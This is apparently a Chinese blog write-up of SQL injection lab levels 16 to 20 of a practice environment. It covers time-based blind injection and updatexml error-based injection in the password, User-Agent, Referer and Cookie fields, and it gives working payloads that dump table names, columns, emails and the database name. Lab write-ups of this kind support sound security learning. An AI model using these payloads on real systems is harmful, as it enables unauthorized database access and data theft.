0
点赞
收藏
分享

微信扫一扫

sql注入16-20

他说Python 2022-03-31 阅读 17

第16关 时间盲注

随便提交几次,发现没有回显,考虑时间盲注

闭合符号
在这里插入图片描述

用户名随意,时间用了26s(用了or连接)
在这里插入图片描述
用户名正确,用了2s(用了and连接)
在这里插入图片描述
第17关 报错注入

从密码入手
在这里插入图片描述
判断闭合
在这里插入图片描述

在已知用户名admin下,进行注入
有回显,使用报错注入
在这里插入图片描述
爆表名

uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&submit=Submit

爆字段

uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit
uname=admin&passwd=' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit

sql注入18 user-agent注入

这题注入的前提是账户名和密码要正确

在这里插入图片描述
使用报错注入

两个都可以用
 ' and updatexml(1,concat(0x7e,(database()),0x7e),1),1,1)#   
 ' ,1, updatexml(1,concat(0x7e,(database()),0x7e),1),1,1)#   

注意后面两个1,将ip和uname代替了
在这里插入图片描述

在这里插入图片描述
sql注入19-referer注入
和18关相差不大,只是注入位置在referer
在这里插入图片描述
sql注入20 cookie注入

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

uname=' union select 1,2,(updatexml(1,concat(0x7e,database(),0x7e),1))# ;
或者
uname=' and updatexml(1,concat(0x7e,database(),0x7e),1)# ;

在这里插入图片描述
在这里插入图片描述

举报

相关推荐

0 条评论